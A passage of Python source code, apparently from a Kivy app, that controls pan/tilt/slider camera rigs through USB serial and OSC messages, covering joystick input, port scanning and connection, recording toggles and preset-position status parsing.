doKeyControlSR = False
SlKeyChange = True
if not doKeyControlSL:
axisZ = 0
else:
axisZ = -255
except:
return
if (not doKeyControlA and not doKeyControlD and not doKeyControlW and not doKeyControlS):
panKeyPressed = False
if (doKeyControlSL and not doKeyControlSR):
sliderKeyPressed = False
'''
def on_stop(self):
if self.serial_port:
self.read_thread = None
def on_touch_up(self, obj, obj_prop):
global mousePTClick
global mouseSlClick
global panKeyPressed
global sliderKeyPressed
global axisX
global axisY
global axisZ
global xDivSet
global yDivSet
if mousePTClick and not panKeyPressed:
mousePTClick = False
self.root.ids.PTJoyDot.pos = (self.screen.width, self.screen.height)
self.root.ids.PTJoyDotPress.pos = ((xDivSet*18), (yDivSet*49))
if mouseSlClick and not sliderKeyPressed:
mouseSlClick = False
self.root.ids.SlJoyDot.pos = (self.screen.width, self.screen.height)
self.root.ids.SlJoyDotPress.pos = ((xDivSet*18), (yDivSet*27))
if cam1isZooming:
self.sendCam1ZoomStop()
if cam2isZooming:
self.sendCam2ZoomStop()
if cam3isZooming:
self.sendCam3ZoomStop()
axisX = 0
axisY = 0
axisZ = 0
self.doJoyMoves(1)
def mouse_pos(self, window, pos):
global abs_coord_x
global abs_coord_y
global abs_coords
global mousePTClick
global mouseSlClick
global axisX
global axisY
global axisZ
global xDivSet
global yDivSet
abs_coord_x = pos[0]
abs_coord_y = pos[1]
abs_coords = (abs_coord_x, abs_coord_y)
if mousePTClick:
PTXMin = (xDivSet*4)
PTXMax = (xDivSet*36)
PTYMin = (yDivSet*35)
PTYMax = (yDivSet*67)
if abs_coord_x < PTXMin: #29:
abs_coord_x = PTXMin #29
elif abs_coord_x > PTXMax: #352:
abs_coord_x = PTXMax #352
if abs_coord_y > PTYMax: #674:
abs_coord_y = PTYMax #674
elif abs_coord_y < PTYMin: #351:
abs_coord_y = PTYMin #351
self.root.ids.PTJoyDotPress.pos = (self.screen.width, self.screen.height)
self.root.ids.PTJoyDot.pos = ((abs_coord_x - (xDivSet*2)), (abs_coord_y - (yDivSet*2)))
axisX = int(self.scale((abs_coord_x), (PTXMin, PTXMax), (-255,255)))
axisY = int(self.scale((abs_coord_y), (PTYMin, PTYMax), (-255,255)))
self.doJoyMoves(1)
if mouseSlClick:
SlXMin = (xDivSet*4)
SlXMax = (xDivSet*36)
SlY = (yDivSet*27)
if abs_coord_x < SlXMin: #29:
abs_coord_x = SlXMin #29
elif abs_coord_x > SlXMax: #352:
abs_coord_x = SlXMax #352
self.root.ids.SlJoyDotPress.pos = (self.screen.width, self.screen.height)
self.root.ids.SlJoyDot.pos = ((abs_coord_x - (xDivSet*2)), SlY)
axisZ = int(self.scale((abs_coord_x), (SlXMin, SlXMax), (-255,255)))
self.doJoyMoves(1)
def PTJoyDotPressed(self):
global abs_coord_x
global abs_coord_y
global mousePTClick
mousePTClick = True
def SlJoyDotPressed(self):
global abs_coord_x
global abs_coord_y
global mouseSlClick
mouseSlClick = True
def doJoyMoves(self, dt):
global axisX
global axisY
global axisZ
global oldAxisX
global oldAxisY
global oldAxisZ
global arr
global currentMillisMoveCheck
global previousMillisMoveCheck
global previousTime
if (axisX == oldAxisX) and (axisY == oldAxisY) and (axisZ == oldAxisZ) and ((abs(axisX) + abs(axisY) + abs(axisZ)) != 0):
currentMillisMoveCheck = time.time()
if (currentMillisMoveCheck - previousMillisMoveCheck > moveCheckInterval):
previousMillisMoveCheck = currentMillisMoveCheck
#arr = [4, axisZh, axisXh, axisYh] # for debugging
self.sendJoystick(arr)
elif ((axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ)): # or doKeyControlA or doKeyControlD or doKeyControlW or doKeyControlS or doKeyControlSL or doKeyControlSR) and ((time.time() - previousTime) > 0.03) :
previousTime = time.time()
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
axisXh = self.toHex(axisX, 16)
axisYh = self.toHex(axisY, 16)
axisZh = self.toHex(axisZ, 16)
arr = [4, axisZh, axisXh, axisYh]
self.sendJoystick(arr)
previousMillisMoveCheck = time.time()
def sendJoystick(self, arr):
global data
global whichCamSerial
global whichCamOSC
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
sliderInt = int(arr[1], 16)
panInt = int(arr[2], 16)
tiltInt = int(arr[3], 16)
data[0] = 4
if ((sliderInt > 0) and (sliderInt < 256)):
data[1] = 0
data[2] = sliderInt
elif sliderInt > 257:
data[1] = 255
data[2] = (sliderInt-65281)
else:
data[1] = 0
data[2] = 0
if ((panInt > 0) and (panInt < 256)):
data[3] = 0
data[4] = panInt
elif panInt > 257:
data[3] = 255
data[4] = (panInt-65281)
else:
data[3] = 0
data[4] = 0
if ((tiltInt > 0) and (tiltInt < 256)):
data[5] = 0
data[6] = tiltInt
elif tiltInt > 257:
data[5] = 255
data[6] = (tiltInt-65281)
else:
data[5] = 0
data[6] = 0
if whichCamOSC > 3:
data[7] = whichCamOSC - 3
else:
data[7] = whichCamSerial
if not self.serial_port:
pass
else:
self.serial_port.write(data)
#print(data) # for debugging
if whichCamSerial == 1:
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
elif whichCamSerial == 2:
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
elif whichCamSerial == 3:
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
self.doButtonColours()
def OSC_on_press(self, cam, key):
global moveType
global data
global whichCamSerial
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global previousMillisMoveCheck
global whichCamOSC
global axisX
global axisY
global axisZ
oldAxisX = 0
oldAxisY = 0
oldAxisZ = 0
if moveType == 1:
if key == 'a':
self.joyL1OSC(cam)
if key == 'd':
self.joyR1OSC(cam)
if key == 'w':
self.joyU1OSC(cam)
if key == 's':
self.joyD1OSC(cam)
if key == ',':
self.joySL10OSC(cam)
if key == '.':
self.joySR10OSC(cam)
elif moveType == 2:
if key == 'a':
self.joyL10OSC(cam)
if key == 'd':
self.joyR10OSC(cam)
if key == 'w':
self.joyU10OSC(cam)
if key == 's':
self.joyD10OSC(cam)
if key == ',':
self.joySL100OSC(cam)
if key == '.':
self.joySR100OSC(cam)
elif moveType == 3:
if key == 'a':
axisX = -255
elif key == 'A':
axisX = 0
if key == 'd':
axisX = 255
elif key == 'D':
axisX = 0
if key == 'w':
axisY = 255
elif key == 'W':
axisY = 0
if key == 's':
axisY = -255
elif key == 'S':
axisY = 0
if key == ',':
axisZ = -255
elif key == '<':
axisZ = 0
if key == '.':
axisZ = 255
elif key == '>':
axisZ = 0
if (axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ):
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
whichCamOSC = cam + 3
self.doJoyMoves(1)
self.doButtonColours()
def scale(self, val, src, dst):
return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]
def toHex(self, val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))
def setPos(self, state):
global SetPosToggle
global xDivSet
global yDivSet
if (SetPosToggle and state == 3) or state == 0:
SetPosToggle = False
client.send_message("/setPos", 0)
client.send_message("/press/bank/4/8", 0)
client.send_message("/press/bank/5/8", 0)
client.send_message("/press/bank/6/8", 0)
client.send_message("/style/bgcolor/4/8", [0, 0, 0])
client.send_message("/style/bgcolor/5/8", [0, 0, 0])
client.send_message("/style/bgcolor/6/8", [0, 0, 0])
self.root.ids.setPos.background_color = get_color_from_hex("#666666")
elif (not SetPosToggle and state == 3) or state == 1:
SetPosToggle = True
client.send_message("/setPos", 1)
client.send_message("/press/bank/4/8", 1)
client.send_message("/press/bank/5/8", 1)
client.send_message("/press/bank/6/8", 1)
client.send_message("/style/bgcolor/4/8", [255, 0, 0])
client.send_message("/style/bgcolor/5/8", [255, 0, 0])
client.send_message("/style/bgcolor/6/8", [255, 0, 0])
self.root.ids.setPos.background_color = get_color_from_hex("#7D0000")
def sendCam1RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&.')
def sendCam2RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&l')
def sendCam3RecordToggle(self):
global SetPosToggle
if SetPosToggle:
self.setPos(3)
self.sendSerial('&o')
def sendCam1RecordToggleOSC(self):
self.sendSerial('&.')
def sendCam2RecordToggleOSC(self):
self.sendSerial('&l')
def sendCam3RecordToggleOSC(self):
self.sendSerial('&o')
def on_btn_scan_release(self):
global btn_scan_show
global xDivSet
global yDivSet
global longestSerial
if not btn_scan_show:
btn_scan_show = True
self.uiDict['box_list'].clear_widgets()
self.device_name_list = []
if platform == 'android':
usb_device_list = usb.get_usb_device_list()
self.device_name_list = [
device.getDeviceName() for device in usb_device_list
]
else:
usb_device_list = list_ports.comports()
self.device_name_list = [port.device for port in usb_device_list]
usb_port = 'usbmodem'
usb_port2 = 'usb/00'
if (usb_port in '\t'.join(self.device_name_list)):
try:
serialPortSelect = [string for string in self.device_name_list if usb_port in string]
self.autoSerial(serialPortSelect, 1)
except:
pass
elif (usb_port2 in '\t'.join(self.device_name_list)):
try:
serialPortSelect = [string for string in self.device_name_list if usb_port2 in string]
self.autoSerial(serialPortSelect, 1)
except:
pass
else:
for device_name in self.device_name_list:
btnText = device_name
if len(btnText) > longestSerial:
longestSerial = len(btnText)
button = Button(text=btnText, size_hint_y=None, height='60dp')
button.bind(on_release=self.on_btn_device_release)
self.uiDict['box_list'].add_widget(button)
self.root.ids.scanDD.pos = (((xDivSet*110)-(xDivSet*(longestSerial/2))), ((yDivSet*65) - ((yDivSet*7.4) * len(usb_device_list))))
if platform == "win32" or platform == "Windows" or platform == "win":
self.root.ids.box_list.size = (((xDivSet*(longestSerial*1.4))), 0)
else:
self.root.ids.box_list.size = (((xDivSet*(longestSerial*0.8))), 0)
else:
btn_scan_show = False
self.uiDict['box_list'].clear_widgets()
def on_btn_help_release(self):
global btn_help_show
if not btn_help_show:
btn_help_show = True
self.root.ids.helpLabel.visible = True
self.root.ids.helpCanvas.visible = True
elif btn_help_show:
btn_help_show = False
self.root.ids.helpLabel.visible = False
self.root.ids.helpCanvas.visible = False
def autoSerial(self, serialPortSelect, dt):
global btn_scan_show
global USBrequsted
global device
global device_name
global serialLoop
btn_scan_show = False
device_name = serialPortSelect[0]
self.root.ids.txtInput_read.text += ("Connecting to: " + device_name + "\n")
self.root.ids.scroll_view.scroll_y = 0
if platform == 'android':
device = usb.get_usb_device(device_name)
if USBrequsted:
previousTicks = time.time() + 5
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions received.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
self.root.ids.txtInput_read.text += "USB permissions declined.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
if not device:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(No devices found)\n"
self.root.ids.scroll_view.scroll_y = 0
return
if not usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "Requesting USB permissions.\n"
self.root.ids.scroll_view.scroll_y = 0
usb.request_usb_permission(device)
USBrequsted = True
Clock.schedule_once(self.doConnect, 1)
return
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
else:
try:
self.serial_port = Serial(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made (auto).\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else :
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n"
self.root.ids.scroll_view.scroll_y = 0
self.serial_port.close()
return
def doConnect(self, dt):
global device
global USBrequsted
global device_name
global serialLoop
if platform == 'android':
previousTicks = time.time() + 5
while not usb.has_usb_permission(device) or (previousTicks <= time.time()):
c = 1
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions received.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
else:
self.root.ids.txtInput_read.text += "USB permissions declined.\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
USBrequsted = False
return
if self.read_thread:
self.read_thread.kill()
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made 2.\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else :
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n" + str(self.read_thread)
self.root.ids.scroll_view.scroll_y = 0
self.serial_port.close()
return
def on_btn_device_release(self, btn):
global serialLoop
device_name = btn.text
self.root.ids.txtInput_read.text += ("Connecting to: " + device_name + "\n")
self.root.ids.scroll_view.scroll_y = 0
self.uiDict['box_list'].clear_widgets()
if platform == 'android':
device = usb.get_usb_device(device_name)
if not device:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(No devices found)\n"
self.root.ids.scroll_view.scroll_y = 0
return
if not usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "Requesting USB permissions.\n"
self.root.ids.scroll_view.scroll_y = 0
usb.request_usb_permission(device)
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
if usb.has_usb_permission(device):
self.root.ids.txtInput_read.text += "USB permissions active.\nConnect again.\n"
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "USB permissinos not set.\nTry again\n"
self.root.ids.scroll_view.scroll_y = 0
return
try:
self.serial_port = serial4a.get_serial_port(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Get serial port)\n"
self.root.ids.scroll_view.scroll_y = 0
return
else:
try:
self.serial_port = Serial(device_name, 38400, 8, 'N', 1, timeout=1)
except:
self.root.ids.txtInput_read.text += "Serial connection failed.\n"
self.root.ids.scroll_view.scroll_y = 0
return
if self.serial_port.is_open and not self.read_thread:
self.read_thread = threading.Thread(target = self.read_msg_thread)
serialLoop = True
self.read_thread.start()
self.root.ids.txtInput_read.text += "Serial connection made (selection).\n"
self.root.ids.scroll_view.scroll_y = 0
self.whichCamSerial1()
self.sendSerial('&!')
else :
self.root.ids.txtInput_read.text += "Serial connection failed.\n(Port open, thread = none)\n"
self.root.ids.scroll_view.scroll_y = 0
def btnReport(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&(1')
elif whichCamSerial == 2:
self.sendSerial('&(2')
elif whichCamSerial == 3:
self.sendSerial('&(3')
def btnReportPos(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&)1')
elif whichCamSerial == 2:
self.sendSerial('&)2')
elif whichCamSerial == 3:
self.sendSerial('&)3')
def btnReportKey(self):
global whichCamSerial
if whichCamSerial == 1:
self.sendSerial('&-1')
elif whichCamSerial == 2:
self.sendSerial('&-2')
elif whichCamSerial == 3:
self.sendSerial('&-3')
def read_msg_thread(self):
global msg
global serialLoop
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
while serialLoop:
global whileLoopRun
if whileLoopRun == False:
serialLoop = False
try:
if not self.serial_port.is_open:
serialLoop = False
received_msg = self.serial_port.readline(self.serial_port.in_waiting)
if received_msg:
msg = bytes(received_msg).decode('utf8', "ignore")
self.readSerial(msg)
except:
self.on_stop()
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Serial Port disconnected.\n[/color]"
self.root.ids.scroll_view.scroll_y = 0
cam1PTSpeed = 1
cam2PTSpeed = 1
cam3PTSpeed = 1
cam1SliderSpeed = 1
cam1SliderSpeed = 1
cam1SliderSpeed = 1
cam1Pos1Run = False
cam1Pos1Set = False
cam1AtPos1 = False
cam1Pos2Run = False
cam1Pos2Set = False
cam1AtPos2 = False
cam1Pos3Run = False
cam1Pos3Set = False
cam1AtPos3 = False
cam1Pos4Run = False
cam1Pos4Set = False
cam1AtPos4 = False
cam1Pos5Run = False
cam1Pos5Set = False
cam1AtPos5 = False
cam1Pos6Run = False
cam1Pos6Set = False
cam1AtPos6 = False
cam2Pos1Run = False
cam2Pos1Set = False
cam2AtPos1 = False
cam2Pos2Run = False
cam2Pos2Set = False
cam2AtPos2 = False
cam2Pos3Run = False
cam2Pos3Set = False
cam2AtPos3 = False
cam2Pos4Run = False
cam2Pos4Set = False
cam2AtPos4 = False
cam2Pos5Run = False
cam2Pos5Set = False
cam2AtPos5 = False
cam2Pos6Run = False
cam2Pos6Set = False
cam2AtPos6 = False
cam3Pos1Run = False
cam3Pos1Set = False
cam3AtPos1 = False
cam3Pos2Run = False
cam3Pos2Set = False
cam3AtPos2 = False
cam3Pos3Run = False
cam3Pos3Set = False
cam3AtPos3 = False
cam3Pos4Run = False
cam3Pos4Set = False
cam3AtPos4 = False
cam3Pos5Run = False
cam3Pos5Set = False
cam3AtPos5 = False
cam3Pos6Run = False
cam3Pos6Set = False
cam3AtPos6 = False
self.doButtonColours()
serialLoop = False
@mainthread
def readSerial(self, msg):
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
global Cam1TextColour
global Cam2TextColour
global Cam3TextColour
global whichCamRead
global xDivSet
global yDivSet
#print(msg)
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
if msg[0] == "":
msg = ''
return
elif msg[0] == "?":
msg = ''
return
elif msg[0] == "~":
if len(msg) == 1:
msg = ''
return
elif msg[1] == "0":
msg = ''
return
elif msg[1:4] == "111": # Cam 1 Set Pos 1
cam1Pos1Set = True
elif msg[1:4] == "121":
cam1Pos2Set = True
elif msg[1:4] == "131":
cam1Pos3Set = True
elif msg[1:4] == "141":
cam1Pos4Set = True
elif msg[1:4] == "151":
cam1Pos5Set = True
elif msg[1:4] == "161":
cam1Pos6Set = True
elif msg[1:4] == "112":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos1Run = True
elif msg[1:4] == "122":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos2Run = True
elif msg[1:4] == "132":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos3Run = True
elif msg[1:4] == "142":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos4Run = True
elif msg[1:4] == "152":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos5Run = True
elif msg[1:4] == "162":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
cam1Pos6Run = True
elif msg[1:4] == "113":
cam1Pos1Run = False
cam1AtPos1 = True
elif msg[1:4] == "123":
cam1Pos2Run = False
cam1AtPos2 = True
elif msg[1:4] == "133":
cam1Pos3Run = False
cam1AtPos3 = True
elif msg[1:4] == "143":
cam1Pos4Run = False
cam1AtPos4 = True
elif msg[1:4] == "153":
cam1Pos5Run = False
cam1AtPos5 = True
elif msg[1:4] == "163":
cam1Pos6Run = False
cam1AtPos6 = True
elif msg[1:4] == "114":
cam1isRecording = False
self.root.ids.cam1Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam1Record.text = "Record"
client.send_message("/style/bgcolor/4/16", [50, 50, 50])
elif msg[1:4] == "124":
cam1isRecording = True
self.root.ids.cam1Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam1Record.text = "Recording"
client.send_message("/style/bgcolor/4/16", [225, 0, 0])
elif msg[1:4] == "100":
cam1Pos1Run = False
cam1Pos1Set = False
cam1AtPos1 = False
cam1Pos2Run = False
cam1Pos2Set = False
cam1AtPos2 = False
cam1Pos3Run = False
cam1Pos3Set = False
cam1AtPos3 = False
cam1Pos4Run = False
cam1Pos4Set = False
cam1AtPos4 = False
cam1Pos5Run = False
cam1Pos5Set = False
cam1AtPos5 = False
cam1Pos6Run = False
cam1Pos6Set = False
cam1AtPos6 = False
elif msg[1:4] == "211": # Cam 2 Set Pos 1
cam2Pos1Set = True
elif msg[1:4] == "221":
cam2Pos2Set = True
elif msg[1:4] == "231":
cam2Pos3Set = True
elif msg[1:4] == "241":
cam2Pos4Set = True
elif msg[1:4] == "251":
cam2Pos5Set = True
elif msg[1:4] == "261":
cam2Pos6Set = True
elif msg[1:4] == "212":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos1Run = True
elif msg[1:4] == "222":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos2Run = True
elif msg[1:4] == "232":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos3Run = True
elif msg[1:4] == "242":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos4Run = True
elif msg[1:4] == "252":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos5Run = True
elif msg[1:4] == "262":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
cam2Pos6Run = True
elif msg[1:4] == "213":
cam2Pos1Run = False
cam2AtPos1 = True
elif msg[1:4] == "223":
cam2Pos2Run = False
cam2AtPos2 = True
elif msg[1:4] == "233":
cam2Pos3Run = False
cam2AtPos3 = True
elif msg[1:4] == "243":
cam2Pos4Run = False
cam2AtPos4 = True
elif msg[1:4] == "253":
cam2Pos5Run = False
cam2AtPos5 = True
elif msg[1:4] == "263":
cam2Pos6Run = False
cam2AtPos6 = True
elif msg[1:4] == "214":
cam2isRecording = False
self.root.ids.cam2Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam2Record.text = "Record"
client.send_message("/style/bgcolor/5/16", [50, 50, 50])
elif msg[1:4] == "224":
cam2isRecording = True
self.root.ids.cam2Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam2Record.text = "Recording"
client.send_message("/style/bgcolor/5/16", [225, 0, 0])
elif msg[1:4] == "200":
cam2Pos1Run = False
cam2Pos1Set = False
cam2AtPos1 = False
cam2Pos2Run = False
cam2Pos2Set = False
cam2AtPos2 = False
cam2Pos3Run = False
cam2Pos3Set = False
cam2AtPos3 = False
cam2Pos4Run = False
cam2Pos4Set = False
cam2AtPos4 = False
cam2Pos5Run = False
cam2Pos5Set = False
cam2AtPos5 = False
cam2Pos6Run = False
cam2Pos6Set = False
cam2AtPos6 = False
elif msg[1:4] == "311": # Cam 3 Set Pos 1
cam3Pos1Set = True
elif msg[1:4] == "321":
cam3Pos2Set = True
elif msg[1:4] == "331":
cam3Pos3Set = True
elif msg[1:4] == "341":
cam3Pos4Set = True
elif msg[1:4] == "351":
cam3Pos5Set = True
elif msg[1:4] == "361":
cam3Pos6Set = True
elif msg[1:4] == "312":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos1Run = True
elif msg[1:4] == "322":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos2Run = True
elif msg[1:4] == "332":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos3Run = True
elif msg[1:4] == "342":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos4Run = True
elif msg[1:4] == "352":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos5Run = True
elif msg[1:4] == "362":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
cam3Pos6Run = True
elif msg[1:4] == "313":
cam3Pos1Run = False
cam3AtPos1 = True
elif msg[1:4] == "323":
cam3Pos2Run = False
cam3AtPos2 = True
elif msg[1:4] == "333":
cam3Pos3Run = False
cam3AtPos3 = True
elif msg[1:4] == "343":
cam3Pos4Run = False
cam3AtPos4 = True
elif msg[1:4] == "353":
cam3Pos5Run = False
cam3AtPos5 = True
elif msg[1:4] == "363":
cam3Pos6Run = False
cam3AtPos6 = True
elif msg[1:4] == "300":
cam3Pos1Run = False
cam3Pos1Set = False
cam3AtPos1 = False
cam3Pos2Run = False
cam3Pos2Set = False
cam3AtPos2 = False
cam3Pos3Run = False
cam3Pos3Set = False
cam3AtPos3 = False
cam3Pos4Run = False
cam3Pos4Set = False
